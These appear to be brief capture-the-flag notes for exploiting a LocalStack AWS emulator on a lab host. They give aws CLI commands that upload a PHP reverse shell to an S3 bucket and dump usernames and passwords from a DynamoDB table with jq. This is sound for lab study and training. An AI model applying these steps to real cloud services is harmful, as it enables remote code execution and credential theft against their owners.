AWS LocalStack LocalStack Test for non-null credentials Configure Creds to not be null with aws config Abuse Creds to get shell Login with the newly created creds aws --endpoint-url http://s3.bucket.htb ls Copy reverse shell to pwd aws --endpoint-url http://s3.bucket.htb cp rev.php s3://adserver/ Enumerate dynamodb List tables aws --endpoint-url http://s3.bucket.htb dynamodb list-tables Dump table aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users Clean table output using jq aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users | jq -r '.Items[] | "\(.username[]):\(.password[])"'